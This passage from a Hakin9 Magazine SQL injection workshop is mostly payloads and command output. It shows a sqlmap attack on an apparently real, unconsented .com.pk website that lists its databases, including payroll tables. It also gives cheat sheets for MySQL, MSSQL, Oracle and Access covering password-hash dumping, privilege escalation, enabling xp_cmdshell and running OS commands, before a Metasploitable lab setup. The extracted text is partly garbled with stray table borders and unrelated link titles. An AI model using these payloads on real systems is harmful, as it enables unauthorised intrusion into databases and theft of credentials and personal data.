--cookie=COOKIE – HTTP Cookie header
--random-agent – Use randomly selected HTTP User-Agent
header
--proxy=PROXY – Use a proxy to connect to the target URL
Operating system access:
--tor – Use Tor anonymity network
--check-tor – Check to see if Tor is used properly
These options can be used to access the back-end database
management system underlying operating system
--os-shell – Prompt for an interactive operating system shell
Injection:
These options can be used to specify which parameters to test for, --os-pwn – Prompt for an OOB shell, meterpreter or VNC
provide custom injection payloads and optional tampering scripts General:
-p TESTPARAMETER – Testable parameter(s)
These options can be used to set some general working
--dbms=DBMS – Force back-end DBMS to this value
parameters
--batch – Never ask for user input, use the default behaviour
Detection:
--flush-session – Flush session files for current target
These options can be used to customize the detection phase
--level=LEVEL – Level of tests to perform (1-5, default 1)
Miscellaneous:
--risk=RISK – Risk of tests to perform (0-3, default 1)
--wizard – Simple wizard interface for beginner users
Techniques:
These options can be used to tweak testing of specific SQL
injection techniques
--technique=TECH – SQL injection techniques to use (default
“BEUSTQ”)
Hakin9 Magazine |
Target website we already have selected. However, we will be presenting the vulnerable link only.
Website vulnerable link: tarrifDetails.aspx?id=’.
To confirm that this is vulnerable, we executed union sql injection attack and ensured as shown in
the following snapshot.
23
Now we will login to Kali Linux and use SQLMAP, which comes as pre-installed in Kali Linux. We will
be using the vulnerable URL as target URL and proceed in hacking into the database as shown in
below snapshots respectively.
Finding Background database name running.
# sqlmap -u “http://www.website.com/tarrifDetails.aspx?id=1” -v 2 --current-db
We will be executing the above attack with SQLMAP and see the outcome to find out the database
name in the background.
root@ralabs:~# sqlmap -u “http://www.website.com.pk/tarrifDetails.aspx?id=1”
-v 2 --current-db
sqlmap/1.0-dev – automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are
not responsible for any misuse or damage caused by this program
[*] starting at 23:08:06
| Hakin9 Magazine
[23:08:06] [DEBUG] cleaning up configuration parameters
[23:08:06] [DEBUG] setting the HTTP timeout
[23:08:06] [DEBUG] setting the HTTP method to GET
[23:08:06] [DEBUG] creating HTTP requests opener object
[23:08:06] [INFO] resuming back-end DBMS ‘microsoft sql server’
[23:08:06] [INFO] testing connection to the target URL
[23:08:09] [INFO] heuristics detected web page charset ‘windows-1252’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
--Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1’ AND 8834=8834 AND ‘GqeT’=’GqeT
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based – WHERE or HAVING clause
Payload: id=1’ AND 1448=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(100)+
CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (1448=1448) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(120)+CHAR(108)+CHAR(98)+CHAR(113))) AND ‘YGie’=’YGie
Vector:
AND
[RANDNUM]=CONVERT(INT,(SELECT
‘[DELIMITER_
START]’+([QUERY])+’[DELIMITER_STOP]’))
Type: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=1’ UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(100)+CHAR(
105)+CHAR(113)+CHAR(83)+CHAR(70)+CHAR(65)+CHAR(90)+CHAR(114)+CHAR(107)+CHAR(
80)+CHAR(90)+CHAR(102)+CHAR(68)+CHAR(113)+CHAR(120)+CHAR(108)+CHAR(98)+CHAR(
113),NULL,NULL-Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL--
24
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=1’ AND 2343=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS
sys6,sysusers AS sys7) AND ‘ySAH’=’ySAH
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM
sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers
AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
--[23:08:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:08:09] [INFO] fetching current database
[23:08:09] [DEBUG] performed 0 queries in 0.00 seconds
current database:
‘___coInnovation’
[23:08:09] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/
output/www.website.com.pk’
[*] shutting down at 23:08:09
You can see that we now have DBMS information, which we have highlighted in red; database name
is truncated for confidentially reasons.
Les proceed further and found out table names and some more information leakage. You can
play with SQLMAP on vulnerable targets very easily, and you can dump the entire contents of the
database. Command to use is shown below.
Hakin9 Magazine |
# sqlmap -u “http://www.website.com.pk/tarrifDetails.aspx?id=1” -v 2 --tables
[23:50:31] [WARNING] the SQL query provided does not return any output
Database: msdb
[9 tables]
+---------------------------------------------------+
| backupfile
|
| backupmediafamily
|
| backupmediaset
|
| backupset
|
| logmarkhistory
|
| restorefile
|
| restorefilegroup
|
| restorehistory
|
| suspect_pages
|
+---------------------------------------------------+
Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS
|
| INFORMATION_SCHEMA.COLUMNS
|
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
|
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES
|
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
|
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
|
| INFORMATION_SCHEMA.DOMAINS
|
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
|
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE
|
| INFORMATION_SCHEMA.PARAMETERS
|
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
|
| INFORMATION_SCHEMA.ROUTINES
|
| INFORMATION_SCHEMA.ROUTINE_COLUMNS
|
| INFORMATION_SCHEMA.SCHEMATA
|
| INFORMATION_SCHEMA.TABLES
|
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS
|
| INFORMATION_SCHEMA.TABLE_PRIVILEGES
|
| INFORMATION_SCHEMA.VIEWS
|
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
|
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE
|
| spt_fallback_db
|
| spt_fallback_dev
|
| spt_fallback_usg
|
| spt_monitor
|
| spt_values
|
| sys.all_columns
|
| sys.all_objects
|
| sys.all_parameters
|
| sys.all_sql_modules
|
| sys.all_views
|
| sys.allocation_units
|
| sys.assemblies
|
| sys.assembly_files
|
| sys.assembly_modules
|
| sys.assembly_references
|
| sys.assembly_types
|
| sys.asymmetric_keys
|
| sys.backup_devices
|
| sys.certificates
|
| sys.check_constraints
|
25
| Hakin9 Magazine
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
26
Hakin9 Magazine |
sys.column_type_usages
sys.column_xml_schema_collection_usages
sys.columns
sys.computed_columns
sys.configurations
sys.conversation_endpoints
sys.conversation_groups
sys.credentials
sys.crypt_properties
sys.data_spaces
sys.database_files
sys.database_mirroring
sys.database_mirroring_endpoints
sys.database_mirroring_witnesses
sys.database_permissions
sys.database_principal_aliases
sys.database_principals
sys.database_recovery_status
sys.database_role_members
sys.databases
sys.default_constraints
sys.destination_data_spaces
sys.dm_broker_activated_tasks
sys.dm_broker_connections
sys.dm_broker_forwarded_messages
sys.dm_broker_queue_monitors
sys.dm_clr_appdomains
sys.dm_clr_loaded_assemblies
sys.dm_clr_properties
sys.dm_clr_tasks
sys.dm_db_file_space_usage
sys.dm_db_index_usage_stats
sys.dm_db_mirroring_connections
sys.dm_db_missing_index_details
sys.dm_db_missing_index_group_stats
sys.dm_db_missing_index_groups
sys.dm_db_partition_stats
sys.dm_db_session_space_usage
sys.dm_db_task_space_usage
sys.dm_exec_background_job_queue
sys.dm_exec_background_job_queue_stats
sys.dm_exec_cached_plans
sys.dm_exec_connections
sys.dm_exec_query_memory_grants
sys.dm_exec_query_optimizer_info
sys.dm_exec_query_resource_semaphores
sys.dm_exec_query_stats
sys.dm_exec_query_transformation_stats
sys.dm_exec_requests
sys.dm_exec_sessions
sys.dm_fts_active_catalogs
sys.dm_fts_index_population
sys.dm_fts_memory_buffers
sys.dm_fts_memory_pools
sys.dm_fts_population_ranges
sys.dm_io_backup_tapes
sys.dm_io_cluster_shared_drives
sys.dm_io_pending_io_requests
sys.dm_os_buffer_descriptors
sys.dm_os_child_instances
sys.dm_os_cluster_nodes
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
sys.dm_os_hosts
sys.dm_os_latch_stats
sys.dm_os_loaded_modules
sys.dm_os_memory_allocations
sys.dm_os_memory_cache_clock_hands
sys.dm_os_memory_cache_counters
sys.dm_os_memory_cache_entries
sys.dm_os_memory_cache_hash_tables
sys.dm_os_memory_clerks
sys.dm_os_memory_objects
sys.dm_os_memory_pools
sys.dm_os_performance_counters
sys.dm_os_ring_buffers
sys.dm_os_schedulers
sys.dm_os_stacks
sys.dm_os_sublatches
sys.dm_os_sys_info
sys.dm_os_tasks
sys.dm_os_threads
sys.dm_os_virtual_address_dump
sys.dm_os_wait_stats
sys.dm_os_waiting_tasks
sys.dm_os_worker_local_storage
sys.dm_os_workers
sys.dm_qn_subscriptions
sys.dm_repl_articles
sys.dm_repl_schemas
sys.dm_repl_tranhash
sys.dm_repl_traninfo
sys.dm_tran_active_snapshot_database_transactions
sys.dm_tran_active_transactions
sys.dm_tran_current_snapshot
sys.dm_tran_current_transaction
sys.dm_tran_database_transactions
sys.dm_tran_locks
sys.dm_tran_session_transactions
sys.dm_tran_top_version_generators
sys.dm_tran_transactions_snapshot
sys.dm_tran_version_store
sys.endpoint_webmethods
sys.endpoints
sys.event_notification_event_types
sys.event_notifications
sys.events
sys.extended_procedures
sys.extended_properties
sys.filegroups
sys.foreign_key_columns
sys.foreign_keys
sys.fulltext_catalogs
sys.fulltext_document_types
sys.fulltext_index_catalog_usages
sys.fulltext_index_columns
sys.fulltext_indexes
sys.fulltext_languages
sys.http_endpoints
sys.identity_columns
sys.index_columns
sys.indexes
sys.internal_tables
sys.key_constraints
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
27
| Hakin9 Magazine
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
28
Hakin9 Magazine |
sys.key_encryptions
sys.linked_logins
sys.login_token
sys.master_files
sys.master_key_passwords
sys.message_type_xml_schema_collection_usages
sys.messages
sys.module_assembly_usages
sys.numbered_procedure_parameters
sys.numbered_procedures
sys.objects
sys.openkeys
sys.parameter_type_usages
sys.parameter_xml_schema_collection_usages
sys.parameters
sys.partition_functions
sys.partition_parameters
sys.partition_range_values
sys.partition_schemes
sys.partitions
sys.plan_guides
sys.procedures
sys.remote_logins
sys.remote_service_bindings
sys.routes
sys.schemas
sys.securable_classes
sys.server_assembly_modules
sys.server_event_notifications
sys.server_events
sys.server_permissions
sys.server_principals
sys.server_role_members
sys.server_sql_modules
sys.server_trigger_events
sys.server_triggers
sys.servers
sys.service_broker_endpoints
sys.service_contract_message_usages
sys.service_contract_usages
sys.service_contracts
sys.service_message_types
sys.service_queue_usages
sys.service_queues
sys.services
sys.soap_endpoints
sys.sql_dependencies
sys.sql_logins
sys.sql_modules
sys.stats
sys.stats_columns
sys.symmetric_keys
sys.synonyms
sys.sysaltfiles
sys.syscacheobjects
sys.syscharsets
sys.syscolumns
sys.syscomments
sys.sysconfigures
sys.sysconstraints
sys.syscurconfigs
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
sys.syscursorcolumns
sys.syscursorrefs
sys.syscursors
sys.syscursortables
sys.sysdatabases
sys.sysdepends
sys.sysdevices
sys.sysfilegroups
sys.sysfiles
sys.sysforeignkeys
sys.sysfulltextcatalogs
sys.sysindexes
sys.sysindexkeys
sys.syslanguages
sys.syslockinfo
sys.syslogins
sys.sysmembers
sys.sysmessages
sys.sysobjects
sys.sysoledbusers
sys.sysopentapes
sys.sysperfinfo
sys.syspermissions
sys.sysprocesses
sys.sysprotects
sys.sysreferences
sys.sysremotelogins
sys.syssegments
sys.sysservers
sys.system_columns
sys.system_components_surface_area_configuration
sys.system_internals_allocation_units
sys.system_internals_partition_columns
sys.system_internals_partitions
sys.system_objects
sys.system_parameters
sys.system_sql_modules
sys.system_views
sys.systypes
sys.sysusers
sys.tables
sys.tcp_endpoints
sys.trace_categories
sys.trace_columns
sys.trace_event_bindings
sys.trace_events
sys.trace_subclass_values
sys.traces
sys.transmission_queue
sys.trigger_events
sys.triggers
sys.type_assembly_usages
sys.types
sys.user_token
sys.via_endpoints
sys.views
sys.xml_indexes
sys.xml_schema_attributes
sys.xml_schema_collections
sys.xml_schema_component_placements
sys.xml_schema_components
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
29
| Hakin9 Magazine
| sys.xml_schema_elements
|
| sys.xml_schema_facets
|
| sys.xml_schema_model_groups
|
| sys.xml_schema_namespaces
|
| sys.xml_schema_types
|
| sys.xml_schema_wildcard_namespaces
|
| sys.xml_schema_wildcards
|
+---------------------------------------------------+
Database: gepcoInnovation
[33 tables]
+---------------------------------------------------+
| Chall1
|
| FAQ
|
| GeneralInfo
|
| Logs
|
| PhoneDirectory
|
| Policy
|
| Table_1
|
| TopManagement
|
| grp
|
| grp_pol
|
| mytest
|
| pcb_tblTariff
|
| sqlmapoutput
|
| tblAdmin
|
| tblApplications
|
| tblBOD
|
| tblCategory
|
| tblCsc
|
| tblFeeder
|
| tblGStation
|
| tblID
|
| tblNews
|
| tblQualification
|
| tblRCCshuts
|
| tblRccSchedule
|
| tblShuts
|
| tblShuts_backup
|
| tblShutss
|
| tblSubDiv
|
| tblTarrifWeb
|
| tblUsers
|
| view1
|
| view2
|
+---------------------------------------------------+
30
Database: __comis
[1 table]
+---------------------------------------------------+
| guest.22DATA-F-122013-TEST
|
+---------------------------------------------------+
Database: gpayroll
[7 tables]
+---------------------------------------------------+
| tblDesignations
|
| tblEmpDesignation
|
| tbldesignations_13082012
|
| tbldesignations_16082012
|
| tblempdesignation_090812
|
Hakin9 Magazine |
|
|
+---------------------------------------------------+
[23:50:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) – 186 times
[23:50:31] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/
output/www.website.com.pk’
Similarly, you can find out the columns and the entire content of the database. Imagine if you can find
credit card or email addresses with passwords!
Keep learning, keep hakin9!
31
| Hakin9 Magazine
Module 4 – SQL Injections
in Access, MSSQL, ORACLE
and MySQL Databases
Introduction
In this module, we will be presenting the techniques you can use to execute SQL injections in these
different types of databases. We will present how you can simply use the SQL Injections and types
of SQL injection to hack into web applications.
Pre-requisite
Strongly recommended that you complete previous three modules.
What we will cover
So far in this workshop, we have been hacking manually as well as with SQLMAP tool. We will build
more knowledge on what type of statements you can use in SQL injections for different types of
database as there is a slight change in bit of syntax in executing SQL injections.
How to Identify Background Database Type
The best way to achieve this is to do something that can generate database errors. This is to help you
go through error messages and identify the database type. This can be achieved by using automated
tools like SQLMAP. But using just the tool is not the job of a security professional. You should know
by your own as well. We will simply present in a tabular form so that you can memorize easily.
32
MS Access
MS SQL Sever
Oracle
MYSQL
Microsoft OLE DB Provider for Microsoft OLE DB Provider for Microsoft OLE DB Provider for Microsoft OLE DB Provider for
ODBC Drivers error ‘80040e14’ SQL Server error ‘80040e14’
ODBC Drivers error ‘80004005’ ODBC Drivers error ‘80040e14’
[Microsoft][ODBC
Microsoft
Access Driver] Syntax error
in string in query expression
‘cat=’ order by code’.
/index.asp, line 173
Unclosed quotation mark after [Microsoft][ODBC driver for
the character string ‘’.
Oracle][Oracle]ORA-01756:
/Modules/Notices/ViewNotice quoted string not properly
terminated
Detail.asp, line 36
[MySQL][ODBC 3.51 Driver]
[mysqld-5.1.63-log]You have an
error in your SQL syntax; check
the manual that corresponds to
/htmls/rptnewsdetail.asp, line 21 your MySQL server version for
the right syntax to use near ‘’’
at line 1
/news/newsdetail.asp, line 190
These are the actual error messages we were getting while executing SQL Injections on four different
websites during a penetration test.
Hakin9 Magazine |
SQL Injections techniques for MySql Database
Motive
Injection
Version
SELECT @@version
Comments
SELECT 1; #comment
Current User
SELECT user();
List User (requires privilege access)
SELECT user FROM mysql.user; — priv
List Password Hashes
SELECT host, user, password FROM mysql.user; — priv
Password Cracker
Use john the ripper
List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
— list user privs
SELECT /*comment*/1;
SELECT system_user();
SELECT
host, user, Select_priv, Insert_priv, Update_priv,
Delete_priv, Create_priv, Drop_priv, Reload_priv,
Shutdown_priv, Process_priv, File_priv, Grant_priv,
References_priv, Index_priv, Alter_priv, Show_db_priv,
Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv
FROM
mysql.user; — priv, list user privs
SELECT grantee, table_schema, privilege_type
FROM
33
information_schema.schema_privileges; — list privs on databases (schemas)
SELECT
table_schema, table_name, column_name, privilege_type
FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts
SELECT
grantee, privilege_type, is_grantable
FROM
information_schema.user_privileges
WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv =
‘Y’; # priv
Current Database
SELECT database()
List Databases
SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE
table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema !=
‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name =
‘username’; — find table which have a column called ‘username’
Create Users
CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete Users
DROP USER test1; — priv
Make User DBA
GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv
| Hakin9 Magazine
SQL Injection techniques for MS SQL Server
Motive
Injection
Version
SELECT @@version
Comments
SELECT 1; #comment
SELECT /*comment*/1;
Current User
SELECT
SELECT
SELECT
SELECT
List Users
user_name();
system_user;
user;
loginame FROM master..sysprocesses WHERE spid = @@SPID
SELECT name FROM master..syslogins
List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need
to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
List Privileges
SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database
SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server
SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table
SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);
–permissions on a user– current privs in 2005, 2008
SELECT is_srvrolemember(‘sysadmin’);
SELECT is_srvrolemember(‘dbcreator’);
SELECT is_srvrolemember(‘bulkadmin’);
SELECT is_srvrolemember(‘diskadmin’);
SELECT is_srvrolemember(‘processadmin’);
SELECT is_srvrolemember(‘serveradmin’);
SELECT is_srvrolemember(‘setupadmin’);
SELECT is_srvrolemember(‘securityadmin’);
– who has a particular priv? 2005, 2008
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELeCT name FROM master..syslogins WHERE bulkadmin = 1;
34
List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the
current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..
sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’;
— list colum names and types for master..sometable
List Tables
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..
sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’;
— list colum names and types for master..sometable
example works only for the current database. If you wan’t to search another db, you need to specify
Find Tables From This
the db name (e.g. replace sysobject with mydb..sysobjects).
Column Name
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON
sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this
lists table, column for each column containing the word ‘password’
Command Execution
Hakin9 Magazine |
EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s
disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
RECONFIGURE; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv
RECONFIGURE; — priv
SQL injection Techniques for Oracle Database
Motive
Injection
Version
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
Comments
SELECT 1 FROM dual — comment
Current User
SELECT user FROM dual
List Users
SELECT username FROM all_users ORDER BY username;
List Password Hashes
SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is
locked
– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table
name ‘dual’ when we’re not actually selecting from a table.
SELECT name FROM sys.user$; — priv
SELECT name,spare4 FROM sys.user$ — priv, 11g
List Databases
SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
List Columns
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
List Tables
SELECT table_name FROM all_tables;
– Also query TNS listener for other databases. SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
SELECT owner, table_name FROM all_tables;
SQL Injection Techniques for MS Access Database
Motive
Injection
Version
Not Supported
Comments
Not Supported
Current User
By Default not supported
Union Support
UINON Attack is supported, but it needs a valid table name in the FROM clause.
Sub query
Sub queries are supported (in the below example “TOP 1” is used to make the query returns
only one row) :
35
‘ AND (SELECT TOP 1 ‘someData’ FROM validTableName)%00
IF Statement
IF () function can be used
IIF (condition,false):
‘ UNION Select (IIF(1=1, ‘a’,’b’) from validTableName%00
return ‘a’
Execute OS Commands Shell () funcyion can be sed to run OS Commands
‘ AND Shell(‘cmd.exe /c echo hacked > C:\file.txt’)
This is a short presentation to cover these four databases; you need extensive strong experience of
writing SQL Statements that are commonly used in the SQL Injections regardless of the database
types. These statements are [select, insert, update]. You also need to gain knowledge on the default
tables/schemas that already exists in these four databases; this is utmost important.
Keep learning, Keep Hackin9!
| Hakin9 Magazine
Module 5 – Setting up
Lab for practicing
SQL Injections
Introduction
So far you have been learning how to hack via SQL injections both manually and by the use of tools.
Now, where should you practice this? Well, I will not say go live hacking as it would be unethical but
you can read my mind. (If you can please)
In this module, we will setup a test environment where you can practice your SQL Injection
techniques. Follow the instruction and experience the fun.
Virtual Lab Setup
• Downloading & Installing Virtual Box
• Downloading Vulnerable Operating System
• Installing the Vulnerable Operating System as Virtual Machine
Downloading & Installing Virtual Box
Download Link: https://www.virtualbox.org/wiki/Downloads.
Select & download the binary, as per your operating system requirement, in our case we will be
installing the VirtualBox-4.3.12-93733-OSX from the above download link as shown below.
36
Hakin9 Magazine |
Double click the icon as shown in step 1 in above figure.
Continue to install by clicking the continue button.
37
Begin installation by clicking the continue button.
| Hakin9 Magazine
Select the installation location or customize the installation as shown above. However, it is
recommended to leave the settings as default and run the installation.
38
Hakin9 Magazine |
Successful installation will be shown as the below screen.
Virtual box installation is now complete. Our next step will be setting up the Vulnerable Box, which
would be hosting vulnerable web applications in a Virtual Machine.
Vulnerable Operating System with Web Applications
39
Metasploitable is the vulnerable operating system which is best suited for practicing all types of
hackingattempts including web applications.
Download Metasploitable from Rapid7.com, and you’ll be sure to get the latest, clean version of
the vulnerable machine.
Download Link
https://information.rapid7.com/metasploitable-download.html.
However, you need to complete a general form so that the community knows you. It’s easy and quick
to download this vulnerable operating system.
Metasploitable comes in a zip format, which you can unzip to get the files to be used as a virtual machine.
Installing Vulnerable Operating System as Virtual Machine
Open Virtual Box and click on ‘New Virtual machine wizard’. Type the name of your choice. I am using
‘Metasploitable-2’. Choose ‘Type’ as Linux and ‘version’ as Ubuntu. Click on Next.
| Hakin9 Magazine
Choose the memory size appropriate to the availability of RAM on your host machine although
1512MB is more than enough. Click on Next.
40
Hakin9 Magazine |
In the hard drive creation window, select option “Use an existing virtual hard drive”, browse to the
folder where we have extracted our zip files and select the ‘vmdk’ file available. Click on Create.
Or you can simply continue with the “Create a virtual hard drive now” option and later change it to
the Metasploitable Hard drive.
41
Now select the disk type as Virtual Machine Disk and continue setting up this virtual machine.
| Hakin9 Magazine
Use the dynamical allocation of hard drive space as we did previously for the Kali Linux and click
continue to keep you moving to the next step of virtual machine creation.
42
Name the hard drive with your convenient name and easy to remember. This is a useful feature as
the hard drive will save the file and naming convention would make it easier for you to move your
file if required.
Hakin9 Magazine |
Now select the Metasploitable disk image we have from the Metasploitable image just downloaded.
Set this as a hard drive, and you are all set to boot this Virtual Machine set as Vulnerable Operating
System into your Virtual Lab Environment.
Here, you proceed with the Vulnerable Operating System ready to be exploited for your Virtual Lab
Environment.
43
Default Login is msfadmin/msfadmin and don’t forget to change the password.
Once completed with the installation browse the IP address of this machine via web browser and
you will find following vulnerable web applications available for you to hack into!
| Hakin9 Magazine
Keep learning, keep hakin9!
44
Hakin9 Magazine |

Hacking with SQL Injections

Transcription

Similar documents

Contact no.(M):9780893349 jalandhar city

How to Install SQL Server 2008

Product Release Bulletin AccountMate 8.1 for SQL and Express July

ASW-1410 - Version 3 - Installation Guide

Mass SQL Injection for Malware Distribution

why every marketeer should take up lifehacking

Web Application Hacking/Security 101

intraosseous posterior teeth

media information 2016

44887 CL saddle club